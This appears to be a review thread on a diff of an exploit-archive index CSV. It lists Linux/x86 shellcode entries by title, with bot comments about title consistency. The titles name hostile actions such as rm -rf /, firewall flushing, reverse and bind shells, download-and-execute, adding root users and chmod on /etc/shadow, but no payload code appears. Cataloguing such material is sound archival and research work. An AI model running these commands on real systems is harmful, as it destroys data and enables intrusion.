13344,platforms/lin_x86/shellcode/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 13344,platforms/lin_x86/shellcode/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0
13345,platforms/lin_x86/shellcode/13345.c,"Linux/x86 - kill all processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 13345,platforms/lin_x86/shellcode/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0
13346,platforms/lin_x86/shellcode/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode,0 13346,platforms/lin_x86/shellcode/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode,0
13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
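Review bot: The 13324 rename narrows "File Reader" to "Read /etc/passwd" but keeps "(65+ bytes)", and the "+" on the size suggests the payload length depends on a path supplied by the user. If the path is configurable, the title should keep the general behaviour and give the default in parentheses, for example "Read File (/etc/passwd) Shellcode (65+ bytes)"; if it is fixed, the "+" should go. The same hunk title-cases 13400's "For Full Access" and 13414's "Kill All Processes" but leaves 13399's "Append RSA key to" in mixed case.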
@ -15879,10 +15881,10 @@ id,file,description,date,author,platform,type,port
13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
13353,platforms/lin_x86/shellcode/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 13353,platforms/lin_x86/shellcode/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0
13354,platforms/lin_x86/shellcode/13354.c,"Linux/x86 - execve(/bin/sh) Shellcode (22 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 13354,platforms/lin_x86/shellcode/13354.c,"Linux/x86 - execve(/bin/sh) Shellcode (22 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0
13355,platforms/lin_x86/shellcode/13355.c,"Linux/x86 - HTTP/1.x GET + Downloads + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,lin_x86,shellcode,0 13355,platforms/lin_x86/shellcode/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,lin_x86,shellcode,0
13356,platforms/lin_x86/shellcode/13356.c,"Linux/x86 - setreuid + executes command (49+ bytes)",2006-08-02,bunker,lin_x86,shellcode,0 13356,platforms/lin_x86/shellcode/13356.c,"Linux/x86 - setreuid + executes command (49+ bytes)",2006-08-02,bunker,lin_x86,shellcode,0
13357,platforms/lin_x86/shellcode/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 13357,platforms/lin_x86/shellcode/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
13358,platforms/lin_x86/shellcode/13358.c,"Linux/x86 - re-use of /bin/sh string in .rodata Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 13358,platforms/lin_x86/shellcode/13358.c,"Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
13359,platforms/lin_x86/shellcode/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 13359,platforms/lin_x86/shellcode/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0
13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0 13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0
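Review bot: Row 13356, "Linux/x86 - setreuid + executes command (49+ bytes)", is left untouched between two renamed rows and is the only title in this hunk without the "Shellcode" suffix before the byte count. Since this change is normalising the titles on either side of it, fix it in the same pass, for example "setreuid + Execute Command Shellcode (49+ bytes)". In 13355, the placeholder host "http://0xdeadbeef/A" is now part of the title; marking it as a default or example value would stop it being read as a real indicator.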
@ -15891,12 +15893,12 @@ id,file,description,date,author,platform,type,port
13364,platforms/generator/shellcode/13364.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",generator,shellcode,0 13364,platforms/generator/shellcode/13364.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",generator,shellcode,0
13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0 13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0
13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0 13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0
13367,platforms/lin_x86/shellcode/13367.c,"Linux/x86 - execve(/bin/sh) + .ZIP Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 13367,platforms/lin_x86/shellcode/13367.c,"Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0
13368,platforms/lin_x86/shellcode/13368.c,"Linux/x86 - execve(/bin/sh) + .RTF Header Shellcode (30 bytes)",2006-04-17,izik,lin_x86,shellcode,0 13368,platforms/lin_x86/shellcode/13368.c,"Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,lin_x86,shellcode,0
13369,platforms/lin_x86/shellcode/13369.c,"Linux/x86 - execve(/bin/sh) + .RIFF Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 13369,platforms/lin_x86/shellcode/13369.c,"Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0
13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve(/bin/sh) + .BMP Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0 13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0
13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - Read SWAP write to /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
13372,platforms/lin_x86/shellcode/13372.c,"Linux/x86 - SWAP store from /tmp/sws Shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 13372,platforms/lin_x86/shellcode/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
13375,platforms/lin_x86/shellcode/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13375,platforms/lin_x86/shellcode/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
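Review bot: The quoting change is applied uniformly to 13367 through 13370, but 13370 still reads "'.BMP' Bitmap Header" while its three siblings read "'.ZIP' Header", "'.RTF' Header" and "'.RIFF' Header". Drop "Bitmap" so the four rows from the same author follow one pattern. In the context rows, 13364 gives its endpoint as "(192.168.13.22:31337)" while 13366 directly below uses "(127.0.0.1:80/TCP)"; that is worth aligning while this block is being edited.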
@ -15904,8 +15906,8 @@ id,file,description,date,author,platform,type,port
13377,platforms/lin_x86/shellcode/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13377,platforms/lin_x86/shellcode/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
13378,platforms/lin_x86/shellcode/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13378,platforms/lin_x86/shellcode/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
13379,platforms/lin_x86/shellcode/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13379,platforms/lin_x86/shellcode/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
13380,platforms/lin_x86/shellcode/13380.c,"Linux/x86 - HTTP/1.x GET_ Downloads + JMP Shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode,0 13380,platforms/lin_x86/shellcode/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode,0
13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy Null-Free Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0 13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280) All Connect() Null-Free Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0
13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0 13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0
13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0 13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0
13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0 13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0
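Review bot: The new 13381 title, "TCP Proxy (192.168.1.16:1280) All Connect() Null-Free Shellcode", adds the phrase "All Connect()" without saying what it means; as written it is not clear whether the proxy forwards every connect() call or something else. Reword it so the behaviour is stated, and add the "/TCP" suffix to the endpoint to match the port notation used in the other rows. The 13380 rename also stacks "Download File ... + Receive Shellcode + Payload Loader Shellcode", where "Download File" and "Receive Shellcode" appear to describe the same step.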
@ -15914,11 +15916,11 @@ id,file,description,date,author,platform,type,port
13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - normal exit with random (so to speak) return value Shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13397,platforms/lin_x86/shellcode/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13397,platforms/lin_x86/shellcode/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,lin_x86,shellcode,0
@ -15926,16 +15928,16 @@ id,file,description,date,author,platform,type,port
13399,platforms/lin_x86/shellcode/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13399,platforms/lin_x86/shellcode/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13400,platforms/lin_x86/shellcode/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13400,platforms/lin_x86/shellcode/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13401,platforms/generator/shellcode/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,generator,shellcode,0 13401,platforms/generator/shellcode/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,generator,shellcode,0
13402,platforms/lin_x86/shellcode/13402.c,"Linux/x86 - Socket-proxy Shellcode (372 bytes)",2005-12-28,xort,lin_x86,shellcode,0 13402,platforms/lin_x86/shellcode/13402.c,"Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)",2005-12-28,xort,lin_x86,shellcode,0
13403,platforms/lin_x86/shellcode/13403.c,"Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13403,platforms/lin_x86/shellcode/13403.c,"Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
13404,platforms/lin_x86/shellcode/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13404,platforms/lin_x86/shellcode/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
13405,platforms/lin_x86/shellcode/13405.c,"Linux/x86 - _exit(1); Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13405,platforms/lin_x86/shellcode/13405.c,"Linux/x86 - _exit(1); Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
13406,platforms/lin_x86/shellcode/13406.c,"Linux/x86 - read(0_buf_2541); + chmod(buf_4755); Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13406,platforms/lin_x86/shellcode/13406.c,"Linux/x86 - read(0_buf_2541); + chmod(buf_4755); Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
13407,platforms/lin_x86/shellcode/13407.c,"Linux/x86 - write(0__Hello core!\n__12); Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13407,platforms/lin_x86/shellcode/13407.c,"Linux/x86 - write(0__Hello core!\n__12); Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
13408,platforms/lin_x86/shellcode/13408.c,"Linux/x86 - snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,lin_x86,shellcode,0 13408,platforms/lin_x86/shellcode/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,lin_x86,shellcode,0
13409,platforms/lin_x86/shellcode/13409.c,"Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,lin_x86,shellcode,0 13409,platforms/lin_x86/shellcode/13409.c,"Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,lin_x86,shellcode,0
13410,platforms/lin_x86/shellcode/13410.s,"Linux/x86 - examples of long-term payloads hide-wait-change Shellcode (.s) (187+ bytes)",2005-09-09,xort,lin_x86,shellcode,0 13410,platforms/lin_x86/shellcode/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes)",2005-09-09,xort,lin_x86,shellcode,0
13411,platforms/lin_x86/shellcode/13411.c,"Linux/x86 - examples of long-term payloads hide-wait-change Shellcode (187+ bytes)",2005-09-08,xort,lin_x86,shellcode,0 13411,platforms/lin_x86/shellcode/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes)",2005-09-08,xort,lin_x86,shellcode,0
13412,platforms/lin_x86/shellcode/13412.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,lin_x86,shellcode,0 13412,platforms/lin_x86/shellcode/13412.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,lin_x86,shellcode,0
13413,platforms/lin_x86/shellcode/13413.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,lin_x86,shellcode,0 13413,platforms/lin_x86/shellcode/13413.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,lin_x86,shellcode,0
13414,platforms/lin_x86/shellcode/13414.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,lin_x86,shellcode,0 13414,platforms/lin_x86/shellcode/13414.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,lin_x86,shellcode,0
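Review bot: rows 13410 and 13411 now carry identical descriptions ("Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes)"), because the "(.s)" marker that distinguished the assembly source from the C file was dropped from 13410. A search of the CSV by description can no longer tell the two entries apart without reading the file column. Suggest keeping a format marker on one of them, for example retaining "(.s)" on 13410.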
@ -15944,28 +15946,28 @@ id,file,description,date,author,platform,type,port
13417,platforms/lin_x86/shellcode/13417.c,"Linux/x86 - setreuid + execve Shellcode (31 bytes)",2004-12-26,oc192,lin_x86,shellcode,0 13417,platforms/lin_x86/shellcode/13417.c,"Linux/x86 - setreuid + execve Shellcode (31 bytes)",2004-12-26,oc192,lin_x86,shellcode,0
13418,platforms/lin_x86/shellcode/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13418,platforms/lin_x86/shellcode/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode,0
13419,platforms/lin_x86/shellcode/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13419,platforms/lin_x86/shellcode/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode,0
13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Radically Self-Modifying Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0
13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0
13422,platforms/lin_x86/shellcode/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,lin_x86,shellcode,0 13422,platforms/lin_x86/shellcode/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,lin_x86,shellcode,0
13423,platforms/lin_x86/shellcode/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0 13423,platforms/lin_x86/shellcode/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0
13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0
13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0 13425,platforms/lin_x86/shellcode/13425.c,"Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0
13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0 13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0
13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
